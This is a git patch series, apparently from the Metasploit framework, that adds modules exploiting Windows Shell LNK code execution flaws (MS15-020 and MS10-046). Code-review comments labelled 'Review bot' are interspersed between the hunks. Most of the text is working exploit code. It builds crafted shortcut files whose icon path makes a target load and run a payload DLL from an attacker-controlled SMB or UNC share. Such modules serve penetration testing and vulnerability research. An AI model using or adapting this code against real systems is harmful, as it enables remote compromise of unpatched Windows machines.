From 5662e5c5a6dc6fb9a06d645df6c738d1721fcbd2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 11 Mar 2015 17:29:02 -0500
Subject: [PATCH 1/6] Add module for MS15-020
---
.../ms15_020_shortcut_icon_dllloader.rb | 158 ++++++++++++++++++
1 file changed, 158 insertions(+)
create mode 100644 modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb
diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb
new file mode 100644
index 0000000000..2fa2c0dc67
--- /dev/null
+++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb
@@ -0,0 +1,158 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::EXE + + attr_accessor :dll_base_name + attr_accessor :exploit_dll_base_name + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows + Shortcut files (.LNK) that contain an icon resource pointing to a + malicious DLL. This module creates a WebDAV service that can be used + to run an arbitrary payload when accessed as a UNC path. + }, + 'Author' => + [ + 'Michael Heerklotz', # Vulnerability discovery + 'juan vazquez' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-0096'], + ['MSB', 'MS15-020'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic', { }] + ], + 'DisclosureDate' => 'Mar 10 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']), + OptString.new('UNCHOST', [true, 'The host portion of the UNC path to provide to clients (ex: 1.2.3.4).']), + OptString.new('UNCSHARE', [true, 'The share folder portion of the UNC path to provide to clients (ex: share).']), + ], self.class) + end + + def smb_host + "\\\\#{datastore['UNCHOST']}\\#{datastore['UNCSHARE']}\\" + end + + def exploit_dll_filename + name_length = 257 - (smb_host.length + 4 + 2) + + self.dll_base_name = dll_base_name || rand_text_alpha(1) + self.exploit_dll_base_name = exploit_dll_base_name || 
rand_text_alpha(name_length) + + "#{dll_base_name} #{exploit_dll_base_name}.dll" + end + + def dll_filename + self.dll_base_name = dll_base_name || rand_text_alpha(1) + + "#{dll_base_name}.dll" + end + + def dll_create(data) + unless ::File.directory?(Msf::Config.local_directory) + FileUtils.mkdir_p(Msf::Config.local_directory) + end + path = File.join(Msf::Config.local_directory, dll_filename) + full_path = ::File.expand_path(path) + File.open(full_path, 'wb') { |fd| fd.write(data) } + + print_good "DLL with payload stored at #{full_path}" + end + + def exploit_dll_create(data) + unless ::File.directory?(Msf::Config.local_directory) + FileUtils.mkdir_p(Msf::Config.local_directory) + end + path = File.join(Msf::Config.local_directory, exploit_dll_filename) + full_path = ::File.expand_path(path) + File.open(full_path, 'wb') { |fd| fd.write(data) } + + print_good "Fake dll to exploit stored at #{full_path}" + end + + def exploit + dll = generate_payload_dll + dll_create(dll) + exploit_dll_create(dll) + + lnk = generate_link("#{smb_host}#{exploit_dll_filename}") + file_create(lnk) + end + + # stolen from ms10_046_shortcut_icon_dllloader, all the credits to the original authors: 'hdm', 'jduck', 'B_H' + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = 
'' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + + ret + end +end From 4e6aca020972f01ece82af5349e11a5c8e850b03 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 18:13:09 -0500 Subject: [PATCH 2/6] refactor create_exploit_file --- .../ms15_020_shortcut_icon_dllloader.rb | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index 2fa2c0dc67..ba39375bb2 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb 
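Review bot: `exploit_dll_filename` computes `name_length = 257 - (smb_host.length + 4 + 2)` from the operator-supplied `UNCHOST` and `UNCSHARE` without checking the result, and none of the three constants is explained. From the returned string the 4 looks like `.dll` and the 2 like the one-character base name plus the space, but 257 has no visible source. With long option values the result reaches zero or goes negative and is passed straight to `rand_text_alpha`, whose behaviour for that input is not visible here. I would name and document the limit and stop early, e.g. `fail_with(Failure::BadConfig, 'UNCHOST and UNCSHARE are too long') if name_length < 1`. The same unchecked subtraction appears in `setup` of the new `smb/ms15_020_shortcut_icon_dllloader.rb` in patch 5/6.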
@@ -78,24 +78,25 @@ class Metasploit3 < Msf::Exploit::Remote "#{dll_base_name}.dll" end - def dll_create(data) + def create_exploit_file(file_name, data) unless ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end - path = File.join(Msf::Config.local_directory, dll_filename) + path = File.join(Msf::Config.local_directory, file_name) full_path = ::File.expand_path(path) File.open(full_path, 'wb') { |fd| fd.write(data) } + full_path + end + + def dll_create(data) + full_path = create_exploit_file(dll_filename, data) + print_good "DLL with payload stored at #{full_path}" end def exploit_dll_create(data) - unless ::File.directory?(Msf::Config.local_directory) - FileUtils.mkdir_p(Msf::Config.local_directory) - end - path = File.join(Msf::Config.local_directory, exploit_dll_filename) - full_path = ::File.expand_path(path) - File.open(full_path, 'wb') { |fd| fd.write(data) } + full_path = create_exploit_file(exploit_dll_filename, data) print_good "Fake dll to exploit stored at #{full_path}" end From 0e4e264325f8a19bc559e2a3434509c5640f8504 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 18:19:28 -0500 Subject: [PATCH 3/6] Redo description --- .../fileformat/ms15_020_shortcut_icon_dllloader.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index ba39375bb2..502577dfd9 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb 
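Review bot: The new `create_exploit_file` keeps the `unless ::File.directory?(...)` guard around `FileUtils.mkdir_p`, which is redundant because `mkdir_p` already succeeds when the directory exists. A bare `FileUtils.mkdir_p(Msf::Config.local_directory)` does the same work and leaves no gap between the check and the create. The helper also mixes `::File` and `File` on adjacent lines. The file as added in patch 1/6 only requires `msf/core`, so `FileUtils` is presumably loaded by the framework; worth confirming, or adding `require 'fileutils'`. A one-line comment such as `# Writes data under Msf::Config.local_directory and returns the absolute path` would document the return value that both callers print. The enclosing class begins outside this hunk.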
@@ -18,10 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ - This module exploits a vulnerability in the handling of Windows - Shortcut files (.LNK) that contain an icon resource pointing to a - malicious DLL. This module creates a WebDAV service that can be used - to run an arbitrary payload when accessed as a UNC path. + This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling + of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious + DLL. This module creates the required files to exploit the vulnerability. They must be + uploaded to an UNC path accessible by the target. This module has been tested successfully + on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 + installed. }, 'Author' => [ From a9fa2d25aa52434f2ac571d0ae9ef59d6b548abc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 23:23:56 -0500 Subject: [PATCH 4/6] Add SMB module for MS10-046 --- .../smb/ms10_046_shortcut_icon_dllloader.rb | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb new file mode 100644 index 0000000000..8c5e68d44e --- /dev/null +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb 
@@ -0,0 +1,125 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::SMB::Server::Share + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows + Shortcut files (.LNK) that contain an icon resource pointing to a + malicious DLL. This creates an SMB resource to provide the payload + inside a DLL, and generates a LNK file which must be sent to the + target. + }, + 'Author' => + [ + 'hdm', # Module itself + 'jduck', # WebDAV implementation, UNCHOST var + 'B_H' # Clean LNK template + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2010-2568'], + ['OSVDB', '66387'], + ['MSB', 'MS10-046'], + ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'DisclosureDate' => 'Jul 16 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) + ], self.class) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) + ], self.class) + + deregister_options('FILE_CONTENTS', 'FILE_NAME') + end + + def setup + super + + self.file_contents = generate_payload_dll + self.file_name = "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" + print_status("File available on #{unc}...") + end + + def primer + lnk = generate_link(unc) + file_create(lnk) + end + + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + 
path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = '' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + ret + end +end From 68d69177ad4b8572ae60d48a5393fa0d170537d3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 23:46:50 -0500 Subject: [PATCH 5/6] Add smb module for MS15-020 --- .../smb/ms10_046_shortcut_icon_dllloader.rb | 1 + .../smb/ms15_020_shortcut_icon_dllloader.rb | 138 ++++++++++++++++++ 2 files changed, 139 insertions(+) create mode 100644 modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb 
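Review bot: Two comments in `generate_link` do not describe the bytes beneath them. `# ExtraData blocks (none)` sits above `ret << [rand(4)].pack('V')`, which does append four bytes. As I read the shell link format this is the terminal block, a 32-bit size below 4, so the comment could read `# ExtraData: no blocks, only the terminal block (32-bit value < 4)`. The LinkFlags line builds the value from a 32-character binary string packed big-endian. `ret[0x14, 4] = [0x81].pack('V')` yields the same four bytes, and a comment naming the two flags (HasLinkTargetIDList and IsUnicode, if I read the bits correctly) would help anyone checking this template against a parser. The same lines are present in the `generate_link` copies added in patches 1/6 and 5/6.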
diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 8c5e68d44e..bd5089e22a 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer lnk = generate_link(unc) file_create(lnk) + print_status('The LNK file must be sent or shared with the target...') end def generate_link(unc) diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb new file mode 100644 index 0000000000..1bed288b79 --- /dev/null +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb 
@@ -0,0 +1,138 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::SMB::Server::Share + + attr_accessor :exploit_dll_name + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling + of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious + DLL. This creates an SMB resource to provide the payload and the trigger, and generates a + LNK file which must be sent to the target. This module has been tested successfully on + Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 + installed. 
+ }, + 'Author' => + [ + 'Michael Heerklotz', # Vulnerability discovery + 'juan vazquez' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-0096'], + ['MSB', 'MS15-020'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'DisclosureDate' => 'Mar 10 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) + ], self.class) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) + ], self.class) + + deregister_options('FILE_CONTENTS', 'FILE_NAME') + end + + def smb_host + "\\\\#{srvhost}\\#{share}\\" + end + + + def setup + super + + self.file_contents = generate_payload_dll + random_char = rand_text_alpha(1) + self.file_name = "#{random_char}.dll" + prefix = "#{random_char} " + random_length = 257 - smb_host.length - file_name.length - prefix.length + self.exploit_dll_name = "#{prefix}#{rand_text_alpha(random_length)}#{file_name}" + + print_status("Payload available on #{unc}...") + print_status("Trigger available on #{smb_host}#{exploit_dll_name}...") + end + + def primer + lnk = generate_link("#{smb_host}#{exploit_dll_name}") + file_create(lnk) + print_status('The LNK file must be sent or shared with the target...') + end + + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 
0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = '' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + ret + end +end From 67d05f93546fc033db0a5457180fcdab8f723f70 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 12 Mar 2015 10:51:01 -0500 Subject: [PATCH 6/6] Add the PR as a reference (how to guide) --- .../windows/fileformat/ms15_020_shortcut_icon_dllloader.rb | 3 ++- .../exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb | 3 ++- .../exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb | 3 ++- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index 502577dfd9..66df942f10 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb 
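Review bot: `generate_link` in this new file is the third copy of the same body added in this series, so any correction to the template has to be made in three places. The first is in the fileformat module from patch 1/6, whose comment says it was taken from the MS10-046 module, and the second is in `smb/ms10_046_shortcut_icon_dllloader.rb` from patch 4/6. Moving the method into one shared mixin that the three modules include would remove the duplication. Separately, `smb_host` rebuilds the UNC prefix by hand from `srvhost` and `share` while `setup` also prints `unc`; if the share mixin already exposes that prefix, deriving one from the other would keep the two status lines consistent, though the mixin is not visible from here. There is also a doubled blank line before `def setup`.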
@@ -35,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], - ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index bd5089e22a..7afff33985 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -34,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote ['CVE', '2010-2568'], ['OSVDB', '66387'], ['MSB', 'MS10-046'], - ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'] + ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb index 1bed288b79..780604be72 100644 --- a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb 
@@ -35,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], - ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => {